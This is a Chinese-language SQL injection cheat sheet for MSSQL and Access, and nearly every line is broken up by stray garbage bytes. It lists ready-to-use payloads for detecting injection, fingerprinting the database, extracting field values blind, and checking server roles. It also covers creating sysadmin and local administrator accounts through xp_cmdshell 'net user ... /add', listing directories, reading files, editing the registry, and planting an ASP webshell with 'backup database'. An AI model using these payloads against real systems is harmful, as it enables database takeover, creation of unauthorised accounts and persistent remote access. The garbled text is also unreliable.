1.判断是否有注入;and 1=1 ;and 1=2 w"zE�_9�I\
2.初步判断是否是mssql ;and user>0 FN8�7^.^2S
�d8x%SQ!V�
3.注入参数是字符'and [查询条件] and ''=' `8�g7��q 5
)�&W*�*!(C
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 'P�d(\$ZY�
p�2O~>97t1
5.判断数据库系统 }iiHr|�l3�
S�2^>6/[xM
;and (select count(*) from sysobjects)>0 mssql �{��qpi?oY
�1�~yZ T��
;and (select count(*) from msysobjects)>0 access #1�/}3+=5B
f��~��h�~5
Y`ihi,s`H�
gS�9>N/b|�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 WZe�wPn>#q
!iu5OX7K|
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 |�+�f-h��,
�4�<���S'�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �_�elX<o4�
x\\7G^$<h�
9.(1)猜字段的ascii值(access) �6� "gj!/e
Akk
3�� Qx
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ��2}W�Dw>V
{E�RMGd6Jp
(2)猜字段的ascii值(mssql) ZFn�(x��*L
0Y+FRB�]u
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ��T0QvnIaP
Pl�xIf���L
10.测试权限结构(mssql) �~���(X�(&
�Af-UScD%G
��?�ny���=
HZjf��`eM,
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- S\ �,�mR4:
4_=Ja2v8;`
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- !]��koS�w}
@F5f"�8!.\
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- {7"0,2 Hb?
t#wmAOW���
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �N$I0�3��m
6d|q+]x_n
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- pV�\YG B+�
LBlN2)\�@�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- W�6�/ @W
b]fz�Rdh�l
;and 1=(select IS_MEMBER('db_owner'));-- -j2� �(R?a
X�9=N%GY[�
K 1#ji*�Tp
a�\5FA�kI�
11.添加mssql和系统的帐户 �{E_{J�B~`
2KJ1V+g@a6
;exec master.dbo.sp_addlogin username;-- p~�jlx~1-]
;exec master.dbo.sp_password null,username,password;-- &X>7n~�@�0
]N)D�S�+V/
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �ERM�a# �L
`�lpz-"EEV
;exec master.dbo.xp_cmdshell 'net user username password 1�Y/$,Oa5
�\Sy�7��"a
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- _t>"5��s&i
)}�l�Rd#V�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- _^S]g��mE�
C"pB"^�0��
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 7�����}o/:
H�Ic� a nk
l|`^*%W@u6
o�cR�db�mS
12.(1)遍历目录 [�0;buVU.
/��R��8p]�
;create table dirs(paths varchar(100), id int) sfD5!Z9�#1
LD��j<�?�'
;insert dirs exec master.dbo.xp_dirtree 'c:\' �&�)9{HR�P
hlbvt-C?}"
;and (select top 1 paths from dirs)>0 3{�7T�4p.G
&%�=D \YzG
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 7'p8���a<x
0BU=)Swk�u
ja=w�5����
Qs 2��.ef?
(2)遍历目录 h�1�D?=M\9
�z�!wDpG7b
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- M4�f;/��`w
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 U.�0kR/>Z=
!X^�C�e)1K
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 q�a'�gM@]
n�hT�(P`6�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 9.�OA,� �6
�)r6E��W`$
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 oy.[+EI`�|
�hU�pn�I@�
g�}�xQ�6rd
_�k66Mkd#b
13.mssql中的存储过程 `FF8ie��8L
P�D[z#T!�'
xp_regenumvalues 注册表根键, 子键 ,^s0<�/v�e
+g�*k*�e>l
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ���7{kP}?�
���h�t97s
xp_regread 根键,子键,键值名 uXZg�1�F�)
!ku�X,*�}q
;exec xp_regread -6~�'���cm
(nSml,�g�U
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 J�l<ns�,Zg
l�H�fe<j]�
xp_regwrite 根键,子键, 值名, 值类型, 值 i\?�*=\��a
f>9s�!Hpu_
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ??�qq:�`s�
B�ik*b)9y2
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ��*s4\\Wb=
,?c�H"@�RJ
xp_regdeletevalue 根键,子键,值名 Zl/<��w(f_
*<4Em{�rZ5
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 x��i~uv�?f
`{K_�/C�it
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 qi���[Z,�&
#E7Am�mqD%
=Ufr^�naA
�pV[�''���
14.mssql的backup创建webshell P�A�;6$vqX
�{d�3<�W N
use model ��B}?IEpYp
;\;M =�&{}
create table cmd(str image); �-1|�iz2^N
PgM��(l3x�
insert into cmd(str) values (''); 1eS_
nLFw~
N5U)*U'-�u
backup database model to disk='c:\l.asp'; MmT�C=/��j
��:\
QUs}�
?*"srE,#JX
cW8����\�d
15.mssql内置函数 F'm(8/�A�$
Z�=S>0|`�R
;and (select @@version)>0 获得Windows的版本号 _`-1a�A&n~
A�vJ,�SQt
;and user_name()='dbo' 判断当前系统的连接用户是不是sa gN6r��p(?y
�X��"MU3]�
;and (select user_name())>0 爆当前系统的连接用户 ->{d`�-}m'
<W)u{KS#TY
;and (select db_name())>0 得到当前连接的数据库 �A=5ep��sB
q�%YV$$c��
R,2P3lv1v@
nR;D#"��p%
16.简洁的webshell CO+/.^s7}S
dP2irC�%f8
use model ��TCKu�,}s
@�Yw,nQE)b
create table cmd(str image); `\u;K9�S6�
G��bP!9I�
insert into cmd(str) values (''); �tiPa��6tQ
E�-��5_{sc
backup database model to disk='g:\wwwtest\l.asp';
